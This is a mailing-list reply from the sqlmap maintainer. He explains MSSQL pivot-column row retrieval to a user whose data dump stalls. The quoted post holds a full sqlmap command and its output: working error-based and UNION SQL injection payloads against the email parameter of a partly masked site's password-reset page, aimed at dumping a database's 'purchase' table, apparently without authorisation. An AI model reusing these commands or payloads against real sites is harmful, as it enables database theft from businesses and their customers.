[sqlmap-users] sqlmap stuck + can not retrieve all rows in aerror based sql injection

unknown

1970-01-01 00:00:00 UTC

--20cf3056431d79230d04bd5722c3
Content-Type: text/plain; charset=ISO-8859-1

Hi.

Post by Daniel Shapira
Hey guys
i have a problem here
take a look
sqlmap almost always stuck with the message - [WARNING] no proper pivot
column
provided (with unique values). It wo
n't be possible to retrieve all rows

This is exactly what it says. As there is no LIMIT/OFFSET mechanism in
MsSQL we use "pivoting" for retrieving data in MsSQL. Unique values for one
column are retrieved while the rest of columns are retrieved through "WHERE
<pivot_column>=current" relation.

Post by Daniel Shapira
even if i let it run for days it will not dump a thing,

People. If sqlmap doesn't dump anything "for minutes" then there is no need
for running it "for days". In those kind of situations options like
--parse-errors or -t traffic.txt are gold.

Post by Daniel Shapira
sometimes it does retrieve some data put out of 1000 rows it will return
around
10 rows only

Is there a way for you to send me privately content of traffic file for
such run (you just have to append --fresh-queries -t traffic.txt to the end
of used commands)

Also, it would be great if you could just try for yourself to run that case
with --no-cast switch and report back if that helped

Kind regards,
Miroslav Stampar

Post by Daniel Shapira
hope someone can help me with that
thanks
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
F:\Users\Dan>cd desktop/sqlmap
F:\Users\Dan\Desktop\sqlmap>sqlmap.py --random-agent -u
http://www.xxxxxxxx.co.il:80/forgotpass.asp--data="cmdLogin==???&sEmail=1" -D
camera4less -T dbo.xxxx -C xxx,xxx,xxx,xxx --dump
sqlmap/1.0-dev (r4976) - automatic SQL injection and database takeover
tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior
mutual
consent is illegal. It is the end user's responsibility to obey all
applicable
local, state and federal laws. Authors assume no liability and are not
responsib
le for any misuse or damage caused by this program
[*] starting at 17:49:12
[17:49:13] [INFO] fetched random HTTP User-Agent header from file
'F:\Users\xxx\
Desktop\sqlmap\txt\user-agents.txt': Mozilla/5.0 (X11; U; Linux x86_64;
en-US) A
ppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.354.0 Safari/533.3
[17:49:13] [INFO] using 'F:\Users\xxx\Desktop\sqlmap\output\www.xxxxx.co.i
l\session' as session file
[17:49:13] [INFO] resuming back-end DBMS 'microsoft sql server 2000' from
sessio
n file
[17:49:13] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s)
reque
---
Place: POST
Parameter: sEmail
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING
clause
Payload: cmdLogin==???&sEmail=1' AND
6043=CONVERT(INT,(CHAR(58)+CHAR(111)+CH
AR(102)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (6043`43) THEN CHAR(49)
ELSE CHAR
(48) END))+CHAR(58)+CHAR(101)+CHAR(111)+CHAR(105)+CHAR(58))) AND
'rxzU'='rxzU
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: cmdLogin==???&sEmail=1' UNION ALL SELECT
CHAR(58)+CHAR(111)+CHAR(10
2)+CHAR(98)+CHAR(58)+CHAR(110)+CHAR(68)+CHAR(79)+CHAR(87)+CHAR(108)+CHAR(111)+CH
AR(87)+CHAR(121)+CHAR(87)+CHAR(90)+CHAR(58)+CHAR(101)+CHAR(111)+CHAR(105)+CHAR(5
8), NULL-- AND 'lpxC'='lpxC
---
[17:49:13] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[1] as LIKE column names (default)
[2] as exact column names

[17:49:17] [INFO] fetching columns 'xxx, xxx, xxx, xxx' for table 'xxx' in
database 'xxx'
[17:49:17] [INFO] the SQL query used returns 4 entries
[17:49:17] [INFO] resumed: "xxx","varchar"
[17:49:17] [INFO] resumed: "xxx","varchar"
[17:49:17] [INFO] resumed: "xxx","varchar"
[17:49:17] [INFO] resumed: "xxx","varchar"
[17:49:17] [INFO] fetching entries of column(s) 'xxx, xxx, xxx, xxx' for
table
'purchase' in database 'xxx'
[17:49:17] [INFO] fetching number of distinct values for column 'xxx'
[17:49:18] [INFO] fetching number of distinct values for column 'xxx'
[17:49:18] [INFO] fetching number of distinct values for column 'xxx
me'
[17:49:18] [INFO] fetching number of distinct values for column 'xxx'
[17:49:18] [WARNING] no proper pivot column provided (with unique values).
It wo
n't be possible to retrieve all rows
------------------------------------------------------------------------------
Better than sec? Nothing is better than sec when it comes to
monitoring Big Data applications. Try Boundary one-second
resolution app monitoring today. Free.
http://p.sf.net/sfu/Boundary-dev2dev
_______________________________________________
sqlmap-users mailing list
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

--
Miroslav Stampar
http://about.me/stamparm

--20cf3056431d79230d04bd5722c3
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable

Hi.<br><br><div class="gmail_quote">On Tue, Apr 10, 2012 at 5:00 PM, Daniel Shapira <span dir="ltr"><<a href="mailto:***@gmail.com">***@gmail.com</a>></span> wrote:<br><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex"> <div dir="ltr"><div><div>Hey guys</div><div>i have a problem here</div><div>take a look</div><div>sqlmap almost always stuck with the message - [WARNING] no proper pivot column�</div><div>provided (with unique values). It wo</div> <div>n't be possible to retrieve all rows</div></div></div></blockquote><div>This is exactly what it says. As there is no LIMIT/OFFSET mechanism in MsSQL we use "pivoting" for retrieving data in MsSQL. Unique values for one column are retrieved while the rest of columns are retrieved through "WHERE <pivot_column>=current" relation.</div>
<blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex"><div dir="ltr"><div><div>even if i let it run for days it will not dump a thing,</div></div></div></blockquote><div>People. If sqlmap doesn't dump anything "for minutes" then there is no need for running it "for days". In those kind of situations options like --parse-errors or -t traffic.txt are gold. </div>
<blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex"><div dir="ltr"><div><div>sometimes it does retrieve some data put out of 1000 rows it will return around </div><div>10 rows only</div>
</div></div></blockquote><div>Is there a way for you to send me privately content of traffic file for such run (you just have to append --fresh-queries -t traffic.txt to the end of used commands)</div><div><br></div><div>
Also, it would be great if you could just try for yourself to run that case with --no-cast switch and report back if that helped</div><div><br></div><div>Kind regards,</div><div>Miroslav Stampar</div><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex"> <div dir="ltr"><div> <div>hope someone can help me with that</div><div>thanks</div></div><div>Microsoft Windows [Version 6.1.7600]</div><div>Copyright (c) 2009 Microsoft Corporation. �All rights reserved.</div><div><br></div><div>F:\Users\Dan>cd desktop/sqlmap</div> <div><br></div><div>F:\Users\Dan\Desktop\sqlmap>sqlmap.py --random-agent -u </div><div><a href="http://www.xxxxxxxx.co.il:80/forgotpass.asp" target="_blank">http://www.xxxxxxxx.co.il:80/forgotpass.asp</a> --data="cmdLogin==???&sEmail=1" -D </div>

<div>camera4less -T dbo.xxxx -C xxx,xxx,xxx,xxx --dump</div><div><br></div><div> sqlmap/1.0-dev (r4976) - automatic SQL injection and database takeover tool</div><div> <a href="http://www.sqlmap.org" target="_blank">http://www.sqlmap.org</a></div>

<div><br></div><div>[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual</div><div> consent is illegal. It is the end user's responsibility to obey all applicable</div><div>local, state and federal laws. Authors assume no liability and are not responsib</div>

<div>le for any misuse or damage caused by this program</div><div><br></div><div>[*] starting at 17:49:12</div><div><br></div><div>[17:49:13] [INFO] fetched random HTTP User-Agent header from file 'F:\Users\xxx\</div>

<div>Desktop\sqlmap\txt\user-agents.txt': Mozilla/5.0 (X11; U; Linux x86_64; en-US) A</div><div>ppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.354.0 Safari/533.3</div><div>[17:49:13] [INFO] using 'F:\Users\xxx\Desktop\sqlmap\output\www.xxxxx.co.i</div>

<div>l\session' as session file</div><div>[17:49:13] [INFO] resuming back-end DBMS 'microsoft sql server 2000' from sessio</div><div>n file</div><div>[17:49:13] [INFO] testing connection to the target url</div>

<div>sqlmap identified the following injection points with a total of 0 HTTP(s) reque</div><div>sts:</div><div>---</div><div>Place: POST</div><div>Parameter: sEmail</div><div> Type: error-based</div><div> Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause</div>

<div> Payload: cmdLogin==???&sEmail=1' AND 6043=CONVERT(INT,(CHAR(58)+CHAR(111)+CH</div><div>AR(102)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (6043=6043) THEN CHAR(49) ELSE CHAR</div><div>(48) END))+CHAR(58)+CHAR(101)+CHAR(111)+CHAR(105)+CHAR(58))) AND 'rxzU'='rxzU</div>

<div><br></div><div> Type: UNION query</div><div> Title: Generic UNION query (NULL) - 2 columns</div><div> Payload: cmdLogin==???&sEmail=1' UNION ALL SELECT CHAR(58)+CHAR(111)+CHAR(10</div><div>2)+CHAR(98)+CHAR(58)+CHAR(110)+CHAR(68)+CHAR(79)+CHAR(87)+CHAR(108)+CHAR(111)+CH</div>

<div>AR(87)+CHAR(121)+CHAR(87)+CHAR(90)+CHAR(58)+CHAR(101)+CHAR(111)+CHAR(105)+CHAR(5</div><div>8), NULL-- AND 'lpxC'='lpxC</div><div>---</div><div><br></div><div>[17:49:13] [INFO] the back-end DBMS is Microsoft SQL Server</div>

<div>web server operating system: Windows 2003</div><div>web application technology: <a href="http://ASP.NET" target="_blank">ASP.NET</a>, Microsoft IIS 6.0, ASP</div><div>back-end DBMS: Microsoft SQL Server 2000</div><div>
do you want sqlmap to consider provided column(s):</div> <div>[1] as LIKE column names (default)</div><div>[2] as exact column names</div><div>> 2</div><div><br></div><div>[17:49:17] [INFO] fetching columns 'xxx, xxx, xxx, xxx' for table 'xxx' in </div><div>
database 'xxx'</div>
<div>[17:49:17] [INFO] the SQL query used returns 4 entries</div><div>[17:49:17] [INFO] resumed: "xxx","varchar"</div><div>[17:49:17] [INFO] resumed: "xxx","varchar"</div><div>[17:49:17] [INFO] resumed: "xxx","varchar"</div>

<div>[17:49:17] [INFO] resumed: "xxx","varchar"</div><div>[17:49:17] [INFO] fetching entries of column(s) 'xxx, xxx, xxx, xxx' for table </div><div>'purchase' in database 'xxx'</div>

<div>[17:49:17] [INFO] fetching number of distinct values for column 'xxx'</div><div>[17:49:18] [INFO] fetching number of distinct values for column 'xxx'</div><div>[17:49:18] [INFO] fetching number of distinct values for column 'xxx</div>

<div>me'</div><div>[17:49:18] [INFO] fetching number of distinct values for column 'xxx'</div><div>[17:49:18] [WARNING] no proper pivot column provided (with unique values). It wo</div><div>n't be possible to retrieve all rows</div>

</div>
<br>------------------------------------------------------------------------------<br>
Better than sec? Nothing is better than sec when it comes to<br>
monitoring Big Data applications. Try Boundary one-second<br>
resolution app monitoring today. Free.<br>
<a href="http://p.sf.net/sfu/Boundary-dev2dev" target="_blank">http://p.sf.net/sfu/Boundary-dev2dev</a><br>_______________________________________________<br>
sqlmap-users mailing list<br>
<a href="mailto:sqlmap-***@lists.sourceforge.net">sqlmap-***@lists.sourceforge.net</a><br>
<a href="https://lists.sourceforge.net/lists/listinfo/sqlmap-users" target="_blank">https://lists.sourceforge.net/lists/listinfo/sqlmap-users</a><br>
<br></blockquote></div><br><br clear="all"><div><br></div>-- <br>Miroslav Stampar<br><a href="http://about.me/stamparm" target="_blank">http://about.me/stamparm</a><br>

--20cf3056431d79230d04bd5722c3--